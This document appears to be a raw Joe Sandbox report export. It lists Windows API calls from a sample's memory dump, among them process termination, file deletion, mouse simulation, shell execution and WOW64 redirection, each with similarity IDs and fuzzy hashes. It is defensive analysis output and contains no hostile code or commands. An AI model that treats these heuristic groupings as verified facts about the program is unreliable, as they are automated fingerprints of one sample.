                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                                        • Opcode ID: dc08b398e35fe19d5778395ac9dee62a8cd4fbfdae42ed9fcba8d2797a9b7576
                                                                                                                                                                        • Instruction ID: 8690d4553d573e39f1b5a6f50bbd23c875276606c625a56cf747b4ce6ced5208
                                                                                                                                                                        • Opcode Fuzzy Hash: dc08b398e35fe19d5778395ac9dee62a8cd4fbfdae42ed9fcba8d2797a9b7576
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D419430601249AFDB2ADF24D889BB6FBF1FB45394F144075E6194B2A2CB316865CF50
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 002E2D45
  • Part of subcall function 002DEF33: GetWindowRect.USER32(?,?), ref: 002DEF4B
• GetDesktopWindow.USER32 ref: 002E2D6F
• GetWindowRect.USER32(00000000), ref: 002E2D76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 002E2DB2
• GetCursorPos.USER32(?), ref: 002E2DDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002E2E3C
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: 34c315b184e3d54cf5ebcb05e6a8efda161a8f1b0516b233fe1f6ea9a2b24968
• Instruction ID: d42af1967b739de58f7f462a77580d5ad1247f2868f13b569119f7c039899ec4
• Opcode Fuzzy Hash: 34c315b184e3d54cf5ebcb05e6a8efda161a8f1b0516b233fe1f6ea9a2b24968
• Instruction Fuzzy Hash: 2A311072515356ABC720DF14DC49FABB7AEFB85364F400A2AF985D7181CA30E918CB92
APIs
• IsWindowVisible.USER32(?), ref: 002C55F9
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002C5616
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002C564E
• _wcslen.LIBCMT ref: 002C566C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002C5674
• _wcsstr.LIBVCRUNTIME ref: 002C567E
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
• Opcode ID: 68c8021f41cc0946ad4361ed6ced94888bad159bb4328377d5f6d13a748ec63d
• Instruction ID: a1bec88dab9434a96a0f0e91b54e3292d1cc12bc2d45c2bc3226bbddf61f6334
• Opcode Fuzzy Hash: 68c8021f41cc0946ad4361ed6ced94888bad159bb4328377d5f6d13a748ec63d
• Instruction Fuzzy Hash: 2B21F532214511BBEB156F24AC49F7BBBADDF45760F24413DF809CA191EAA0E891DA60
APIs
  • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
• _wcslen.LIBCMT ref: 002D62C0
• CoInitialize.OLE32(00000000), ref: 002D63DA
• CoCreateInstance.OLE32(00300CC4,00000000,00000001,00300B34,?), ref: 002D63F3
• CoUninitialize.OLE32 ref: 002D6411
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
• Opcode ID: d165f2d7db4c1e1bf6ee4232e7a2982c42d15aef704ffb64181ed1600d429191
• Instruction ID: 0fc3cc30a1cac31fbb4257f08a907ae0593e8c75575c59ff0d30667e9fec4425
• Opcode Fuzzy Hash: d165f2d7db4c1e1bf6ee4232e7a2982c42d15aef704ffb64181ed1600d429191
• Instruction Fuzzy Hash: 4DD15475A142019FC714DF24C488A2ABBE5FF88714F15899EF8859B361CB31EC95CF92
APIs
• GetLastError.KERNEL32(?,?,002836E9,00283355), ref: 00283700
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0028370E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00283727
• SetLastError.KERNEL32(00000000,?,002836E9,00283355), ref: 00283779
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 679013fc1ecec82d0dfdeed65fe324b10f00e66e26ea7f9c5a260034e4e95d7b
• Instruction ID: 35091af01f98f8ebaa4a8846cd65d374b07154b760250502bda892a75fdb97b2
• Opcode Fuzzy Hash: 679013fc1ecec82d0dfdeed65fe324b10f00e66e26ea7f9c5a260034e4e95d7b
• Instruction Fuzzy Hash: 2901D8BE57F3126EA735BBB4BCCA9666698EB05F71B30022DF110410F1EF518D229B40
APIs
• GetLastError.KERNEL32(?,00000000,00284D53,00000000,?,?,002868E2,?,?,00000000), ref: 002930EB
• _free.LIBCMT ref: 0029311E
• _free.LIBCMT ref: 00293146
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00293153
• SetLastError.KERNEL32(00000000,?,00000000), ref: 0029315F
• _abort.LIBCMT ref: 00293165
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3160817290-0
APIs
  • Part of subcall function 00261F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261F87
  • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261F96
  • Part of subcall function 00261F2D: BeginPath.GDI32(?), ref: 00261FAD
  • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261FD6
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002F94AA
• LineTo.GDI32(?,00000003,00000000), ref: 002F94BE
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002F94CC
• LineTo.GDI32(?,00000000,00000003), ref: 002F94DC
• EndPath.GDI32(?), ref: 002F94EC
• StrokePath.GDI32(?), ref: 002F94FC
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 002C5B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 002C5B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C5B94
• ReleaseDC.USER32(00000000,00000000), ref: 002C5B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 002C5BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 002C5BC5
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 002632AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 002632B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 002632C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 002632CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 002632D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 002632DD
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002CF447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002CF45D
• GetWindowThreadProcessId.USER32(?,?), ref: 002CF46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002CF48C
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• GetClientRect.USER32(?), ref: 002A34EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 002A3506
• GetWindowDC.USER32(?), ref: 002A3512
• GetPixel.GDI32(00000000,?,?), ref: 002A3521
• ReleaseDC.USER32(?,00000000), ref: 002A3533
• GetSysColor.USER32(00000005), ref: 002A354D
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 002C21CC
• UnloadUserProfile.USERENV(?,?), ref: 002C21D8
• CloseHandle.KERNEL32(?), ref: 002C21E1
• CloseHandle.KERNEL32(?), ref: 002C21E9
• GetProcessHeap.KERNEL32(00000000,?), ref: 002C21F2
• HeapFree.KERNEL32(00000000), ref: 002C21F9
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b9a12994e07c25710b2d79672c52effd6a3cc0d715ddf87184aacbdb3eadb3e3
• Instruction ID: 3dad8ddb1f34a664c1cac1aba46e7892ba2c9d00be6ee90ab027dd830e74de3b
• Opcode Fuzzy Hash: b9a12994e07c25710b2d79672c52effd6a3cc0d715ddf87184aacbdb3eadb3e3
• Instruction Fuzzy Hash: 94E0C27A004109BBDB012BA1FC0CD2ABF2AFB493B2B104230F22982070CB329420EF50
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 002EB903
  • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
• GetProcessId.KERNEL32(00000000), ref: 002EB998
• CloseHandle.KERNEL32(00000000), ref: 002EB9C7
Strings
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
• Opcode ID: b371c6298e5f3dbc6d24da61d5f20b438d8660924c8465b3c91d79fc8942bb82
• Instruction ID: fbd314ef2c8f20e367a8dd699347f6440d3f6c67643736fac033c69635149e36
• Opcode Fuzzy Hash: b371c6298e5f3dbc6d24da61d5f20b438d8660924c8465b3c91d79fc8942bb82
• Instruction Fuzzy Hash: 71718874A20215DFCB11EF55C484A9EBBF4BF08310F048499E859AB392CB70ED91CF90
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C7B6D
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002C7BA3
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002C7BB4
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C7C36
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 1eefa618a84e095b14d361068dc1f5f7a74e8dc91b7a1b073baa86f2b5e2ffa4
• Instruction ID: 2731da5096f8f7d7296ce782356ec2ea3b256220ed9786c6ca2a2ad85e0e73cb
• Opcode Fuzzy Hash: 1eefa618a84e095b14d361068dc1f5f7a74e8dc91b7a1b073baa86f2b5e2ffa4
• Instruction Fuzzy Hash: D041AEB1614206EFDB15CF64D884FAA7BB9EF44310F1081AEA90A9F205D7B0DE54CFA0
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F48D1
• IsMenu.USER32(?), ref: 002F48E6
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F492E
• DrawMenuBar.USER32 ref: 002F4941
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 3295c34f2a6b9640d2d1ac392d12565b4a8ec071f1900b2844fa53098ed99017
• Instruction ID: dd6f3154b00ca70178b6a0679757d4e7e83c0ab51bf6da23ccbfe14fac151a4f
• Opcode Fuzzy Hash: 3295c34f2a6b9640d2d1ac392d12565b4a8ec071f1900b2844fa53098ed99017
• Instruction Fuzzy Hash: 90416C75A1020EEFDB10DF51D884AABBBB9FF053A4F448129EA4597260D7B0AD64CF60
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002C27B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002C27C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 002C27F6
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
Strings
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: 82a98392decbe20aef5774da1297fd652b0b8af490d3d742c96d59f2e8ce7467
• Instruction ID: ad4dd3d650feb2ef4dd15629b9855a62528906e706fb82ec8d48b6742921d798
• Opcode Fuzzy Hash: 82a98392decbe20aef5774da1297fd652b0b8af490d3d742c96d59f2e8ce7467
• Instruction Fuzzy Hash: 80210171A10104BADB05ABA0DC8AEFEB778DF453A0B00432DF422A71E1CF34496A9A60
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002F3A29
• LoadLibraryW.KERNEL32(?), ref: 002F3A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002F3A45
• DestroyWindow.USER32(?), ref: 002F3A4D
Strings
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: 517e4de6a84929b159bb335cdb902407ebe17a519651eae0044f2e289ea5a603
• Instruction ID: f3c0c9cfd5631dc11101f2920485145af886bcb762b0da89452c89c4dccbcf3b
• Opcode Fuzzy Hash: 517e4de6a84929b159bb335cdb902407ebe17a519651eae0044f2e289ea5a603
• Instruction Fuzzy Hash: 7321D47252020AABEB10CF65EC84FBBB7ADEB443A4F105234FB9196190C3B1CD609760
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• GetCursorPos.USER32(?), ref: 002F9A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002F9A72
• GetCursorPos.USER32(?), ref: 002F9ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 002F9AF0
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 2864067406-113007392
                                                                                                                                                                        • Opcode ID: c49302eeb43645b89de28f6beab47fe095be491e77bb6986f12dc682821eba3f
                                                                                                                                                                        • Instruction ID: 4170459aa2dca9bb3bf8b76f37d0d295d5062d727ace210e45eb560ccb83f897
                                                                                                                                                                        • Opcode Fuzzy Hash: c49302eeb43645b89de28f6beab47fe095be491e77bb6986f12dc682821eba3f
                                                                                                                                                                        • Instruction Fuzzy Hash: A121B13551001CEFCF258F58D898FFEBBB9EB093A0F504065FA068B161D73199A1DB50
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00261AF4
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 002A31F9
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002A3203
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002A320E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 4127811313-113007392
                                                                                                                                                                        • Opcode ID: 4896569d28ffdd77ebc56046f5b6ae3e206194637063d4cd07efb194d0ea72e8
                                                                                                                                                                        • Instruction ID: 01f6361e532122693d8d58154d1b5da16c5c33c89ef182b686609b6eecd3fc83
                                                                                                                                                                        • Opcode Fuzzy Hash: 4896569d28ffdd77ebc56046f5b6ae3e206194637063d4cd07efb194d0ea72e8
                                                                                                                                                                        • Instruction Fuzzy Hash: 07113A31A1101AEFCB10DFA4D98A9FE77B9EB05394F100462F912E6150CB71BAA1DBA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0028508E,?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002), ref: 002850FD
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00285110
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0028508E,?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285133
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        • Opcode ID: c37c3fc8a62aa90f8a5d9c640426ef4b967fea251454c006afab7deb937742f6
                                                                                                                                                                        • Instruction ID: 5dd576c2f69436bf2a99c82f2bb69c9a1d4efa8b52a51eacc43fc073a7c113d7
                                                                                                                                                                        • Opcode Fuzzy Hash: c37c3fc8a62aa90f8a5d9c640426ef4b967fea251454c006afab7deb937742f6
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0C834911218BBDB11AF94DC5DBEDBFB6EF04B62F000068F809A21A0CB349D51CB91
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026666E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                                                        • Opcode ID: 72ad3c5d05d5c48219e765308c6b9e10cbf7a28aa1d475151248c24bc23c8f21
                                                                                                                                                                        • Instruction ID: cf7f66ab2f016dc87b0deccd5e096bfd4d210966ded47dad6217c2139d981b47
                                                                                                                                                                        • Opcode Fuzzy Hash: 72ad3c5d05d5c48219e765308c6b9e10cbf7a28aa1d475151248c24bc23c8f21
                                                                                                                                                                        • Instruction Fuzzy Hash: C6E086356115231793121B25FC1CA7F652D9F82B66F050225F904D2100DB94CC51C4A5
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266610
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00266622
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266635
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                        • Opcode ID: 1ef77b61160132471811525f9fa85e5d8b9dda2220c6e2f982cc73c24c0144e2
                                                                                                                                                                        • Instruction ID: 1c22604b89c348a41ce0ecd2b190862457e9c3afff9bbb0f9c7a9df3abc941c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef77b61160132471811525f9fa85e5d8b9dda2220c6e2f982cc73c24c0144e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BD012356229335743222B25BC2C9AF6A1A9E92BA13090035F914B2114CF64CD51C5E9
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D35C4
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 002D3646
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002D365C
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D366D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D367F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                        • Opcode ID: c54e39d957797d7be019c5651a972bdbac34442b9330782fd8bca7c398361f3d
                                                                                                                                                                        • Instruction ID: 948bf08f7add54c3f9204f3dce5b4893c26f7396d72612902a354b5c50e44360
                                                                                                                                                                        • Opcode Fuzzy Hash: c54e39d957797d7be019c5651a972bdbac34442b9330782fd8bca7c398361f3d
                                                                                                                                                                        • Instruction Fuzzy Hash: BDB15E72911119ABDF11EFA4DC85EDEBBBDEF48310F0040A6F509A7241EA749F588FA1
APIs
• GetCurrentProcessId.KERNEL32 ref: 002EAE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002EAE95
